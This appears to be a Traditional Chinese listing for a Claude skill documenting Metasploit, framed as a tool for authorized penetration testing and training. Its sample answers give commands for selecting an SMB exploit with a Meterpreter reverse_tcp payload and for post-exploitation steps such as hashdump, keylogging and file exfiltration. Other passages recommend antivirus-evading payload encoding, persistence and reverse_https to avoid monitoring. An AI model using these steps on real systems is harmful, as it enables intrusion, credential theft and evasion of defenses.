metasploit-framework
使用 Claude 掌握 Metasploit 滲透測試
安全專業人員在授權滲透測試工作流程中需要專業指導。此技能提供全面的 Metasploit Framework 文件,涵蓋利用、載荷生成以及後滲透活動,並包含法律最佳實務。
下載技能 ZIP
在 Claude 中上傳
前往 設定 → 功能 → 技能 → 上傳技能
開啟並開始使用
測試它
正在使用「metasploit-framework」。 如何啟動 msfconsole 並搜尋 SMB 利用?
預期結果:
若要啟動 msfconsole 並搜尋 SMB 利用:使用 'msfconsole -q' 以安靜模式啟動主控台,然後使用 'search type:exploit smb' 尋找 SMB 相關的利用模組。您也可以使用 'search eternalblue' 專門搜尋 MS17-010 SMB 漏洞利用。選擇前使用 'info [module_name]' 檢視模組詳細資訊。
正在使用「metasploit-framework」。 配置和使用帶有 meterpreter 載荷的利用需要哪些步驟?
預期結果:
配置利用需要六個步驟:首先使用 'use [module_path]' 選擇利用。執行 'show options' 檢視所��設定。使用 'set RHOSTS [target_ip]' 和 'set RPORT [port]' 設定目標參數。使用 'set PAYLOAD windows/x64/meterpreter/reverse_tcp' 選擇您的載荷。使用 'set LHOST [your_ip]' 和 'set LPORT [port]' 配置監聽器。最後執行 'exploit' 嘗試入侵並建立 Meterpreter 會話。
正在使用「metasploit-framework」。 獲得會話後應該使用哪些 Meterpreter 指令?
預期結果:
建立 Meterpreter 會話後,執行 'sysinfo' 和 'getuid' 以了解您的存取層級。使用 'hashdump' 提取密碼雜湊值並使用 'ps' 檢視執行中的處理程序。執行 'migrate [PID]' 移動到更穩定的處理程序。對於資料滲漏,使用 'download [file]' 或 'upload [file]'。執行 'screenshot' 擷取桌面或 'keyscan_start' 開始按鍵記錄。使用 'background' 將會話置於背景以返回 msfconsole。
安全審計
中風險This skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.
中風險問題 (1)
低風險問題 (3)
風險因素
⚙️ 外部命令 (4)
🌐 網路存取 (3)
📁 檔案系統存取 (1)
品質評分
你能建構什麼
滲透測試工作流程指導
安全專業人員在授權滲透測試委託期間使用此技能來瀏覽 Metasploit Framework 功能、選擇適當的利用模組、配置載荷,以及在法律範圍內進行後滲透活動。
安全評估文件
紅隊成員利用此���能在安全評估報告中記錄 Metasploit 使用情況,確保正確的指令語法、模組選擇和後滲透活動被準確記錄於客戶交付成果中。
安全培訓的教育資源
網路安全學生和認證考生使用此技能來學習 Metasploit Framework 概念、在實驗室環境中練習滲透測試工作流程,以及準備 OSCP、CEH 和 PTX 等認證。
試試這些提示
我該如何搜尋並選擇適合具有 SMB 漏洞之 Windows 目標的 Metasploit 利用模組?
引導我配置帶有 meterpreter reverse_tcp 載荷的 eternalblue 利用,包括設定 RHOSTS、LHOST 和所需選項。
在建立 Meterpreter 會話後,我應該使用哪些指令來列舉目標系統、收集憑證以及在授權滲透測試期間維持持久性?
生成一個 msfvenom 指令來建立具有反向 TCP 連線的 Windows 執行檔載荷,包括編碼以規避防毒偵測。
最佳實務
- 在使用 Metasploit 進行任何滲透測試活動之前��務必取得書面授權
- ���先使用 'check' 指令驗證目標漏洞,然後再執行利用以將干擾降至最低
- 在部署至生產���估目標之前,先在隔離的實驗室環境中測試載荷
- 記錄所有指令、結果和發現以包含在滲透測試報告中
- 盡可能使用加密的 reverse_https 載荷而非 reverse_tcp 以規避網路監控
- 立即將會���置於背景並遷移處理程序以維持存取穩定性
避免
- 請勿在未經明確書面授權的系統上使用 Metasploit 利用 — 這是非法的
- 避免在沒有適當偵察和漏洞驗證的情況下,依序對目標執行所有利用
- 絕不要在文件或培訓期間的範例指令中使用生產系統或公用 IP 位址
- 不要讓使用中的 Meterpreter 會話無人看管,或在評估後忘記正確關閉它們
- 避免使用未經編碼的載荷,這些載荷很容易被防毒軟體偵測到,而未先測試規避技術